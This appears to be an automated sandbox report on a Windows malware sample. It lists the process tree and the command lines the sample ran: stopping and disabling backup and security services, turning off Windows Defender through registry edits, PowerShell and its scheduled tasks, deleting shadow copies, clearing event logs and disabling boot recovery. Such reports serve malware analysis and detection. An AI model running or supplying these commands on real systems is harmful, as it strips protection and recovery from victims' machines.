PID 2940 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 2940 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 1368 wrote to memory of 1164 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1368 wrote to memory of 1164 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2940 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 2940 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 972 wrote to memory of 2460 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 972 wrote to memory of 2460 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2940 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 2940 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 1064 wrote to memory of 380 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1064 wrote to memory of 380 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2940 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 2940 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 3796 wrote to memory of 4000 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3796 wrote to memory of 4000 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2940 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 2940 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 1988 wrote to memory of 3632 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1988 wrote to memory of 3632 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2940 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 2940 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 3844 wrote to memory of 1472 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3844 wrote to memory of 1472 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2940 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 2940 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 3032 wrote to memory of 2212 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3032 wrote to memory of 2212 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2940 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 2940 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 2112 wrote to memory of 2092 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2112 wrote to memory of 2092 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2940 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\sc.exe
PID 2940 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\reg.exe
PID 2940 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\reg.exe
PID 2940 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\reg.exe
PID 2940 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\reg.exe
PID 2940 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\reg.exe
PID 2940 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\reg.exe
PID 2940 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\reg.exe
PID 2940 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\reg.exe
PID 2940 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\reg.exe
PID 2940 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe

"C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_12dde" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_12dde" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_12dde" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Country Destination Domain Proto
US 8.8.8.8:53 time.windows.com udp
US 168.61.215.74:123 time.windows.com udp

Files

memory/3164-115-0x0000000000000000-mapping.dmp

memory/672-116-0x0000000000000000-mapping.dmp

memory/1368-117-0x0000000000000000-mapping.dmp

memory/1164-118-0x0000000000000000-mapping.dmp

memory/972-119-0x0000000000000000-mapping.dmp

memory/2460-120-0x0000000000000000-mapping.dmp

memory/1064-121-0x0000000000000000-mapping.dmp

memory/380-122-0x0000000000000000-mapping.dmp

memory/3796-123-0x0000000000000000-mapping.dmp

memory/4000-124-0x0000000000000000-mapping.dmp

memory/1988-125-0x0000000000000000-mapping.dmp

memory/3632-126-0x0000000000000000-mapping.dmp

memory/3844-127-0x0000000000000000-mapping.dmp

memory/1472-128-0x0000000000000000-mapping.dmp

memory/3032-129-0x0000000000000000-mapping.dmp

memory/2212-130-0x0000000000000000-mapping.dmp

memory/2112-131-0x0000000000000000-mapping.dmp

memory/2092-132-0x0000000000000000-mapping.dmp

memory/1232-133-0x0000000000000000-mapping.dmp

memory/696-134-0x0000000000000000-mapping.dmp

memory/1808-135-0x0000000000000000-mapping.dmp

memory/2164-136-0x0000000000000000-mapping.dmp

memory/2376-137-0x0000000000000000-mapping.dmp

memory/1488-138-0x0000000000000000-mapping.dmp

memory/1720-139-0x0000000000000000-mapping.dmp

memory/1228-140-0x0000000000000000-mapping.dmp

memory/2200-141-0x0000000000000000-mapping.dmp

memory/2132-142-0x0000000000000000-mapping.dmp

memory/2156-143-0x0000000000000000-mapping.dmp

memory/2944-144-0x0000000000000000-mapping.dmp

memory/3668-145-0x0000000000000000-mapping.dmp

memory/668-146-0x0000000000000000-mapping.dmp

memory/2308-147-0x0000000000000000-mapping.dmp

memory/2284-148-0x0000000000000000-mapping.dmp

memory/2908-149-0x0000000000000000-mapping.dmp

memory/3912-150-0x0000000000000000-mapping.dmp

memory/2256-151-0x0000000000000000-mapping.dmp

memory/3932-152-0x0000000000000000-mapping.dmp

memory/2104-153-0x0000000000000000-mapping.dmp

memory/888-154-0x0000000000000000-mapping.dmp

memory/1216-155-0x0000000000000000-mapping.dmp

memory/1364-156-0x0000000000000000-mapping.dmp

memory/2348-157-0x0000000000000000-mapping.dmp

memory/380-158-0x0000000000000000-mapping.dmp

memory/1692-159-0x0000000000000000-mapping.dmp

memory/1396-160-0x0000000000000000-mapping.dmp

memory/1112-161-0x0000000000000000-mapping.dmp

memory/448-162-0x0000000000000000-mapping.dmp

memory/2212-163-0x0000000000000000-mapping.dmp

memory/1140-164-0x0000000000000000-mapping.dmp

memory/508-165-0x0000000000000000-mapping.dmp

memory/1092-166-0x0000000000000000-mapping.dmp

memory/968-167-0x0000000000000000-mapping.dmp

memory/2180-168-0x0000000000000000-mapping.dmp

memory/2060-169-0x0000000000000000-mapping.dmp

memory/1492-170-0x0000000000000000-mapping.dmp

memory/2120-171-0x0000000000000000-mapping.dmp

memory/3092-172-0x0000000000000000-mapping.dmp

memory/2340-173-0x0000000000000000-mapping.dmp

memory/1496-174-0x0000000000000000-mapping.dmp

memory/1028-175-0x0000000000000000-mapping.dmp

memory/2272-176-0x0000000000000000-mapping.dmp

memory/3128-177-0x0000000000000000-mapping.dmp

memory/2216-178-0x0000000000000000-mapping.dmp

memory/2108-180-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-179-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-181-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-182-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-183-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-184-0x0000021F59920000-0x0000021F59942000-memory.dmp

memory/2108-185-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-186-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-187-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-188-0x0000021F73F20000-0x0000021F73F96000-memory.dmp

memory/2108-189-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-193-0x0000021F598D0000-0x0000021F598D2000-memory.dmp

memory/2108-194-0x0000021F598D3000-0x0000021F598D5000-memory.dmp

memory/2108-195-0x0000021F598D6000-0x0000021F598D8000-memory.dmp

memory/2108-196-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-197-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-217-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-218-0x0000021F57E60000-0x0000021F57E62000-memory.dmp

memory/2108-219-0x0000021F598D8000-0x0000021F598D9000-memory.dmp

memory/3076-221-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

memory/3076-222-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

memory/3076-223-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

memory/3076-224-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

memory/3076-225-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

memory/3076-226-0x000001D2B18F0000-0x000001D2B1912000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 daca2eb0c15c4b16335f40f34f730407
SHA1 492da0ed645ed1b2a52c6ac6ae17f7b1ade086d8
SHA256 b1d1833e6e44405d6ce5eb3b4fa74b4964429873469c9ee96addd839bcb3e442
SHA512 1cfd87ace13a58a07ae53101d86fbc3f908762254091df81e49d00cafb74cfa2a3e214d86ce2ed5e5ce57a10a935aee1790f80a28025cf12651535d7956e5589

memory/3076-228-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

memory/3076-229-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

memory/3076-230-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

memory/3076-231-0x000001D2B1AA0000-0x000001D2B1B16000-memory.dmp

memory/3076-232-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

memory/3076-236-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

memory/3076-237-0x000001D2958E0000-0x000001D2958E2000-memory.dmp

memory/3076-258-0x000001D297323000-0x000001D297325000-memory.dmp

memory/3076-257-0x000001D297320000-0x000001D297322000-memory.dmp

memory/3076-259-0x000001D297326000-0x000001D297328000-memory.dmp

memory/3076-262-0x000001D297328000-0x000001D297329000-memory.dmp